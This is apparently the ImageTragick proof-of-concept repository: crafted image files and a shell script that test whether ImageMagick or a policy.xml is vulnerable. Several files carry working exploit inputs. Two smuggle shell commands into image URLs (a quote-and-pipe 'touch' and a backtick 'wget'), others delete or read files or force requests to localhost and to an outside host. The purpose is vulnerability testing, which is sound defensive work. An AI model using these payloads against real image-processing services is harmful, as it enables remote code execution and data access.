├── test.png ├── msl.jpg ├── delete.jpg ├── read.jpg ├── localhost_http.jpg ├── rce1.jpg ├── http.jpg ├── msl.xml ├── rce2.jpg ├── README.md └── test.sh /test.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/ImageTragick/PoCs/HEAD/test.png -------------------------------------------------------------------------------- /msl.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'msl:msl.xml' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /delete.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'ephemeral:delme' 4 | popgraphic-context 5 | 6 | -------------------------------------------------------------------------------- /read.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'label:@readme' 4 | popgraphic-context 5 | 6 | -------------------------------------------------------------------------------- /localhost_http.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://localhost:PORT/)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /rce1.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(https://127.0.0.0/oops.jpg"|touch "rce1)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /http.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | fill 'url(http://NONCE.imagetragick.hacker.toys/test.jpg)' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /msl.xml: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | -------------------------------------------------------------------------------- /rce2.jpg: -------------------------------------------------------------------------------- 1 | push graphic-context 2 | viewbox 0 0 640 480 3 | image over 0,0 0,0 'https://127.0.0.1/x.php?x=`wget -O- google.com > rce2`' 4 | pop graphic-context 5 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # ImageTragick POCs 2 | 3 | ## How To Use 4 | ``` 5 | git clone https://github.com/ImageTragick/PoCs.git 6 | cd PoCs 7 | ./test.sh 8 | ``` 9 | 10 | To test a `policy.xml` file place it in the script directory and run `test.sh`. 11 | 12 | ## Safe Output 13 | ``` 14 | user@host:~/code/PoCs$ ./test.sh 15 | testing read 16 | SAFE 17 | 18 | testing delete 19 | SAFE 20 | 21 | testing http with local port: 38663 22 | SAFE 23 | 24 | testing http with nonce: a7DyBeV7 25 | SAFE 26 | 27 | testing rce1 28 | SAFE 29 | 30 | testing rce2 31 | SAFE 32 | 33 | testing MSL 34 | SAFE 35 | ``` 36 | 37 | ## Unsafe Output 38 | ``` 39 | user@host:~/code/PoCs$ ./test.sh 40 | testing read 41 | UNSAFE 42 | 43 | testing delete 44 | UNSAFE 45 | 46 | testing http with local port: 44755 47 | UNSAFE 48 | 49 | testing http with nonce: a7DvBer2 50 | UNSAFE 51 | 52 | testing rce1 53 | UNSAFE 54 | 55 | testing rce2 56 | UNSAFE 57 | 58 | testing MSL 59 | UNSAFE 60 | ``` 61 | -------------------------------------------------------------------------------- /test.sh: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env bash 2 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )" 3 | 4 | # test for convert and identify 5 | type identify >/dev/null 2>&1 || { echo >&2 "I require imagemagick but it's not installed. Aborting."; exit 1; } 6 | type convert >/dev/null 2>&1 || { echo >&2 "I require imagemagick but it's not installed. Aborting."; exit 1; } 7 | 8 | 9 | # Uncomment these two lines to test with a local copy of policy.xml 10 | MAGICK_CONFIGURE_PATH=$DIR 11 | export MAGICK_CONFIGURE_PATH 12 | 13 | # Finding MD5 calculator 14 | #echo "finding MD5 calculator" 15 | for f in md5sum md5 16 | do 17 | MD5SUM_EXE=`which $f 2> /dev/null` 18 | if test ${MD5SUM_EXE}; then 19 | break 20 | fi 21 | done 22 | if ! test ${MD5SUM_EXE}; then 23 | echo >&2 "not found. Aborting." 24 | exit 1 25 | fi 26 | 27 | echo "testing read" 28 | echo "Hello World" > readme 29 | #echo "##### convert ######" 30 | convert read.jpg readme.png 2>/dev/null 1>/dev/null 31 | #echo "####################" 32 | if [ ! -e readme.png ] 33 | then 34 | echo "SAFE" 35 | else 36 | echo "UNSAFE" 37 | rm readme.png 38 | fi 39 | rm readme 40 | echo "" 41 | 42 | 43 | echo "testing delete" 44 | touch delme 45 | #echo "#### identify ######" 46 | identify delete.jpg 2>/dev/null 1>/dev/null 47 | #echo "####################" 48 | if [ -e delme ] 49 | then 50 | echo "SAFE" 51 | rm delme 52 | else 53 | echo "UNSAFE" 54 | fi 55 | echo "" 56 | 57 | #random port above 16K 58 | PORT=$(($RANDOM + 16384)) 59 | echo "testing http with local port: ${PORT}" 60 | # silence job control messages 61 | set -b 62 | # setup a dummy http server 63 | printf "HTTP/1.0 200 OK\n\n" | nc -l ${PORT} > requestheaders 2>/dev/null & 64 | if test $? -ne 0; then 65 | echo >&2 "failed to listen on localhost:${PORT}" 66 | exit 1 67 | fi 68 | sed "s/PORT/${PORT}/g" localhost_http.jpg > localhost_http1.jpg 69 | identify localhost_http1.jpg 2>/dev/null 1>/dev/null 70 | rm localhost_http1.jpg 71 | if test -s requestheaders; then 72 | echo "UNSAFE" 73 | else 74 | echo "SAFE" 75 | # terminate the dummy server 76 | nc -z localhost ${PORT} 2>/dev/null >/dev/null 77 | fi 78 | rm requestheaders 79 | set +b 80 | echo "" 81 | 82 | NONCE=$(echo $RANDOM | ${MD5SUM_EXE} | fold -w 8 | head -n 1) 83 | echo "testing http with nonce: ${NONCE}" 84 | IP=$(curl -q -s ifconfig.co) 85 | sed "s:NONCE:${NONCE}:g" http.jpg > http1.jpg 86 | #echo "#### identify ######" 87 | identify http1.jpg 2>/dev/null 1>/dev/null 88 | #echo "####################" 89 | rm http1.jpg 90 | if curl -q -s "http://hacker.toys/dns?query=${NONCE}.imagetragick" | grep -q $IP; then 91 | echo "UNSAFE" 92 | else 93 | echo "SAFE" 94 | fi 95 | echo "" 96 | 97 | echo "testing rce1" 98 | #echo "#### identify ######" 99 | identify rce1.jpg 2>/dev/null 1>/dev/null 100 | #echo "####################" 101 | if [ -e rce1 ] 102 | then 103 | echo "UNSAFE" 104 | rm rce1 105 | else 106 | echo "SAFE" 107 | fi 108 | echo "" 109 | 110 | echo "testing rce2" 111 | #echo "#### identify ######" 112 | identify rce2.jpg 2>/dev/null 1>/dev/null 113 | #echo "####################" 114 | if [ -e rce2 ] 115 | then 116 | echo "UNSAFE" 117 | rm rce2 118 | else 119 | echo "SAFE" 120 | fi 121 | echo "" 122 | 123 | echo "testing MSL" 124 | #echo "#### identify ######" 125 | identify msl.jpg 2>/dev/null 1>/dev/null 126 | #echo "####################" 127 | if [ -e msl.hax ] 128 | then 129 | echo "UNSAFE" 130 | rm msl.hax 131 | else 132 | echo "SAFE" 133 | fi 134 | echo "" 135 | --------------------------------------------------------------------------------